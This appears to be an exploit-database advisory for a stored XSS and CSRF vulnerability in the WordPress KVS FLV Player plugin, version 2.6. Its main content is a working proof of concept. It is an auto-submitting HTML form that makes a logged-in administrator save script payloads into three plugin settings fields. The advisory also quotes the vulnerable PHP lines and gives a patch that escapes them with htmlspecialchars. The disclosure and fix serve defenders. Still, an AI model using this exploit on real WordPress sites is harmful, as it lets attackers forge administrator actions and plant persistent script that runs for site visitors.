Wordpress KVS Player Stored XSS/CSRF

2015.09.14

Credit: Ashiyane Digital security Team

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79
CWE-352

# Exploit Title: Wordpress KVS Player Stored XSS/CSRF
# Exploit Author: Ashiyane Digital security Team
# Vendor Homepage:https://wordpress.org/plugins/kvs-flv-player/
# Software Link: https://downloads.wordpress.org/plugin/kvs-flv-player.zip
# Version: 2.6
# Date: 2015 - 09 - 11
# Tested on: windows 7 /FireFox
####################################################
#Exploit :
<form name="form1" method="POST" Action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=kvs-player">
<input type="hidden" name="width" value="854" />
<input type="hidden" name="height" value="480" />
<input type="hidden" name="hide_controlbar" value="1" />
<input type="hidden" name="hide_style" value="fade" />
<input type="hidden" name="preview_url" value='"><script>alert("xss1")</script>' />
<input type="hidden" name="embed" value="" />
<input type="hidden" name="sec" value='"><script>alert("xss 2")</script>' />
<input type="hidden" name="bt" value='"><script>alert("xss 3")</script>' />
<input type="hidden" name="save_changes" value="Save Changes" />
</form>
<script language="javascript">
setTimeout('form1.submit()', 1);
</script>

####################################################################
# Vulnerable File : /wp-content/plugins/kvs-flv-player/kvs-flv-player.php
# Vulnerable code:
line 136 :
<input type="text" id="preview_url" name="preview_url" value="<?php echo $kvs_player_options['preview_url']; ?>" size="40"/>
line 194 :
<input type="text" id="sec" name="sec" value="<?php echo $kvs_player_options['sec']; ?>" size="10"/>
line 203 :
<input type="text" id="bt" name="bt" value="<?php echo $kvs_player_options['bt']; ?>" size="10"/>
===============================================
# For patch:
Replace Lines  :
line 136 :
<input type="text" id="preview_url" name="preview_url" value="<?php echo htmlspecialchars($kvs_player_options['preview_url']); ?>" size="40"/>
line 194 :
<input type="text" id="sec" name="sec" value="<?php echo htmlspecialchars($kvs_player_options['sec']); ?>" size="10"/>
line 203 :
<input type="text" id="bt" name="bt" value="<?php echo htmlspecialchars($kvs_player_options['bt']); ?>" size="10"/>
##########################################################
discover by : Amir.ght(Goldhack)

References:

https://wordpress.org/plugins/kvs-flv-player/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Wordpress KVS Player Stored XSS/CSRF

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.